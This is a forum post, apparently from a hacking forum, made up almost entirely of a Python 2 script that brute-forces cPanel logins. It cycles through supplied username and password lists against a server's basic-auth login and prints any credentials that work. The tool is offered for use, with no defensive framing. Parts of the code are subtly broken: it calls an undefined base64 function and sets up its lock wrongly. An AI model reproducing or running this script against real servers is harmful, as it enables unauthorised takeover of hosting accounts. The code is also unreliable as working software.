Jump to content
Ras

[Python] cPanel Brute Forcer

By Ras, in Programare

Recommended Posts

Ras Newbie

Ras

Posted
Posted 
#!usr/bin/python

import threading, time, random, sys, urllib2, httplib, base64
from copy import copy

def title():
   print "\n\t   d3hydr8[at]gmail[dot]com cPanel BruteForcer v1.0"
   print "\t-----------------------------------------------------\n"

def timer():
   now = time.localtime(time.time())
   return time.asctime(now)

if len(sys.argv) !=5:
   title()
   print "\nUsage: ./cPanelbrute.py <server> <port> <userlist> <wordlist>\n"
   print "ex: python cPanelbrute.py example.com 2082 users.txt wordlist.txt\n"
   sys.exit(1)

try:
     users = open(sys.argv[3], "r").readlines()
except(IOError):
     print "Error: Check your userlist path\n"
     sys.exit(1)

try:
     words = open(sys.argv[4], "r").readlines()
except(IOError):
     print "Error: Check your wordlist path\n"
     sys.exit(1)

wordlist = copy(words)

def reloader():
   for word in wordlist:
      words.append(word)

def getword():
   lock = threading.Lock()
   lock.acquire()
   if len(words) != 0:
      value = random.sample(words,  1)
      words.remove(value[0])      
   else:
      print "\nReloading Wordlist - Changing User\n"
      reloader()
      value = random.sample(words,  1)
      users.remove(users[0])

   lock.release()
   if len(users) ==1:
      return users[0], value[0][:-1]
   else:
      return users[0][:-1], value[0][:-1]

def getauth(url):

   req = urllib2.Request(url)
   try:
          handle = urllib2.urlopen(req)
   except IOError, e:               
          pass
   else:                               
          print "This page isn't protected by basic authentication.\n"
          sys.exit(1)

   if not hasattr(e, 'code') or e.code != 401:                 
          print "\nThis page isn't protected by basic authentication."
          print 'But we failed for another reason.\n'
          sys.exit(1)

   authline = e.headers.get('www-authenticate', '')   

   if not authline:
          print '\nA 401 error without a basic authentication response header - very weird.\n'
          sys.exit(1)
   else:
      return authline

class Worker(threading.Thread):

   def run(self):
      username, password = getword()
      try:
         print "-"*12
         print "User:",username,"Password:",password
         auth_handler = urllib2.HTTPBasicAuthHandler()
         auth_handler.add_password("cPanel", server, base64encodestring(username)[:-1], base64encodestring(password)[:-1])
         opener = urllib2.build_opener(auth_handler)
         urllib2.install_opener(opener)
         urllib2.urlopen(server)
         print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n"         
      except (urllib2.HTTPError, httplib.BadStatusLine), msg:
         #print "An error occurred:", msg
         pass

title()
if sys.argv[1][-1] == "/":
   sys.argv[1] = sys.argv[1][:-1]
server = sys.argv[1]+":2082"
if sys.argv[2].isdigit() == False:
   print "[-] Port must be a number\n"
   sys.exit(1)
else:
   port = sys.argv[2]
if sys.argv[1][-1] == "/":
   sys.argv[1] = sys.argv[1][:-1]
server = sys.argv[1]+":"+port

print "[+] Server:",server
print "[+] Port:",port
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+]",getauth(server)
print "[+] Started",timer(),"\n"

for i in range(len(words)*len(users)):
   work = Worker()
   work.setDaemon(1)
   work.start()
   time.sleep(1)
print "\n[-] Done -",timer(),"\n"

  • Thanks 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...